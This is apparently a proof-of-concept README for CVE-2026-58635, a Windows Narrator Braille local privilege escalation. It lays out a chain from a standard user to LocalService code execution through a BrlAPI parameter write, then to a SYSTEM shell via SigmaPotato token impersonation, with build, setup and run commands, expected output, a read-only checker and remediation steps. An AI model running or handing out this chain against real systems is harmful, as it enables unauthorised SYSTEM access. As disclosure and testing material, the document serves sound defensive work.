## https://sploitus.com/exploit?id=E845E4F1-345B-599F-A195-00B7604EBC69
# CVE-2026-58635: Windows Narrator Braille Local Privilege Escalation
Proof of concept for **CVE-2026-58635**, a command-injection vulnerability in
Windows Narrator Braille. A local authenticated user can abuse a writable
BrlAPI parameter to make the privileged BRLTTY service execute an arbitrary
program.
Microsoft rates the issue **Important** with a CVSS 3.1 score of **7.8**
(`CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`) and maps it to **CWE-77**.
> This repository is intended only for authorized testing in an isolated lab.
> Do not run it on production systems or systems you do not own or administer.
## What the proof of concept demonstrates
The PoC exercises the following path:
```text
standard user
-> starts the locally accessible BrlAPI service
-> connects to localhost:0 with auth=none
-> writes global BrlAPI parameter 29 (literary braille table)
-> BRLTTY interprets an executable path as an external contraction table
-> BRLTTY launches the supplied program as LocalService
-> optional SeImpersonate token stage
-> interactive SYSTEM command prompt
```
The CVE-specific primitive ends at arbitrary execution as **LocalService**.
On the tested Windows configuration, that token has
`SeImpersonatePrivilege`, so the included demonstration optionally uses
[SigmaPotato](https://github.com/tylerdotrar/SigmaPotato) to obtain a SYSTEM
token and launch a visible shell in the active console session.
## Why parameter 29 is significant
BRLTTY 6.4.1 exposes `BRLAPI_PARAM_LITERARY_BRAILLE_TABLE` as global and
writable. The server passes the supplied string through its contraction-table
loader. On Windows, a path whose extension is present in `PATHEXT` is treated
as an external contraction program and started through BRLTTY's host-command
launcher.
The trigger normalizes an ordinary Windows path such as
`C:\lab\bin\localservice_stage.exe` to the forward-slash form expected by this
BRLTTY/MinGW path-handling branch. No user profile, drive letter, Windows
directory, or account name is compiled into the PoC.
## Affected systems
The optional **Accessibility.Braille** capability must be installed for the
tested attack surface to exist. The Microsoft CNA record lists multiple
Windows client and server branches as affected below their July 2026 fixed
revisions. Common examples include:
| Product branch | Potentially affected below | Known fixed level |
| --- | ---: | ---: |
| Windows 10 1809 / Server 2019 | `17763.9020` | `17763.9020` or later |
| Windows 10 21H2 | `19044.7548` | `19044.7548` or later |
| Windows 10 22H2 | `19045.7548` | `19045.7548` or later |
| Windows Server 2022 | `20348.5386` | `20348.5386` or later |
| Windows 11 24H2 | `26100.8875` | `26100.8875` or later |
| Windows 11 25H2 | `26200.8875` | `26200.8875` or later |
| Windows 11 26H1 | `28000.2525` | `28000.2525` or later |
Build numbers alone are a screening signal, not a substitute for the vendor
advisory and installed-component inventory. Use the included read-only checker:
```powershell
powershell -ExecutionPolicy Bypass -File .\scripts\Check-Vulnerability.ps1
```
It reports:
- OS build and update revision;
- Accessibility.Braille capability state;
- presence of `brlapi.dll` and `brltty.exe`;
- BrlAPI service registration and identity;
- comparison against the known fixed revision for supported branches; and
- SHA-256 hashes of the installed Braille components.
The checker does **not** start BrlAPI, write parameter 29, or execute a payload.
## Repository layout
```text
.
โโโ bin/ Compiled PoC binaries and SigmaPotato
โโโ scripts/
โ โโโ Check-Vulnerability.ps1 Read-only exposure/build check
โ โโโ Clear-Results.cmd Remove generated result files
โ โโโ Get-SigmaPotato.ps1 Fetch and hash-check the upstream helper
โ โโโ Prepare-Lab.ps1 Install the optional feature and set lab ACLs
โ โโโ Run-PoC.cmd Standard-user end-to-end demonstration
โโโ src/
โ โโโ brlapi_trigger.cpp BrlAPI client and parameter-29 write
โ โโโ localservice_stage.cpp LocalService identity proof and optional chain
โ โโโ path_util.h Runtime path helpers
โ โโโ system_shell_launcher.cpp
โโโ third_party/SigmaPotato/ Version, hash, license, and attribution
โโโ Makefile
โโโ LICENSE
โโโ SHA256SUMS
โโโ NOTICE
```
## Build
The original PoC is C++17 and builds with the MinGW-w64 x86-64 toolchain.
On Debian or Ubuntu:
```bash
sudo apt install make g++-mingw-w64-x86-64
make
```
The build creates:
```text
bin/brlapi_trigger.exe
bin/localservice_stage.exe
bin/system_shell_launcher.exe
```
To obtain the exact SigmaPotato version used by the end-to-end demonstration,
run this from Windows:
```powershell
powershell -ExecutionPolicy Bypass -File .\scripts\Get-SigmaPotato.ps1
```
The download script pins release `v1.2.6` and verifies SHA-256:
```text
EC68A6BF7F104A815BD21E27E73A8DFB8AFCB282D4997BEBE9ECCD6C89259506
```
## Lab setup
### 1. Prepare the optional Windows component
From an elevated PowerShell prompt in the repository root:
```powershell
powershell -ExecutionPolicy Bypass -File .\scripts\Prepare-Lab.ps1
```
This script:
1. installs `Accessibility.Braille~~~~0.0.1.0` when absent;
2. grants built-in Users read/execute access to the repository; and
3. grants LocalService modify access so the service can execute the stage and
create evidence under `bin\results`.
If the capability is staged but the service is not yet registered, reboot and
run the preparation script once more.
### 2. Use an existing standard-user account
Sign in with any local or domain account that is **not** a member of the local
Administrators group. The repository does not create users or set passwords.
Security products commonly detect token-impersonation proof-of-concept tools.
Configure the isolated lab according to your organization's test policy before
placing or running the binaries. Do not weaken endpoint protection on a normal
workstation.
### 3. Run the PoC
From a non-elevated command prompt:
```cmd
scripts\Run-PoC.cmd
```
Expected output includes:
```text
Connection: descriptor= host=localhost:0 auth=none
Parameter 29 global write: 0
USER=LOCAL SERVICE
SID=S-1-5-19
```
The optional second stage records its output in `bin\results\escalation.log`.
On success, `bin\results\system_shell_status.txt` contains `CREATED=1`, and a
new window titled `CVE-2026-58635 SYSTEM SHELL` opens. In that window:
```cmd
whoami
```
should return:
```text
nt authority\system
```
## Result files
All generated evidence is placed in `bin\results`:
| File | Purpose |
| --- | --- |
| `localservice_identity.txt` | Username, SID, and PID of the CVE-launched stage |
| `localservice_whoami.txt` | Full token groups and privileges |
| `escalation.log` | Output from the optional token-impersonation helper |
| `escalation_status.txt` | Helper process creation/error/exit status |
| `system_shell_status.txt` | Active-session shell creation result |
Remove generated results with:
```cmd
scripts\Clear-Results.cmd
```
## Remediation and verification
Install the applicable July 2026 security update or a later cumulative update.
For Windows 11 24H2 and 25H2, Microsoft ships the fixed revisions in
**KB5101650** (`26100.8875` and `26200.8875`). If Braille support is not needed,
removing the optional capability also removes this attack surface:
```powershell
Remove-WindowsCapability -Online -Name Accessibility.Braille~~~~0.0.1.0
```
After remediation, rerun `Check-Vulnerability.ps1` and confirm that the system
meets the fixed revision or that the component is absent.
## References
- [Microsoft Security Update Guide: CVE-2026-58635](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58635)
- [NVD: CVE-2026-58635](https://nvd.nist.gov/vuln/detail/CVE-2026-58635)
- [Microsoft KB5101650](https://support.microsoft.com/help/5101650)
- [BRLTTY](https://brltty.app/)
- [SigmaPotato](https://github.com/tylerdotrar/SigmaPotato)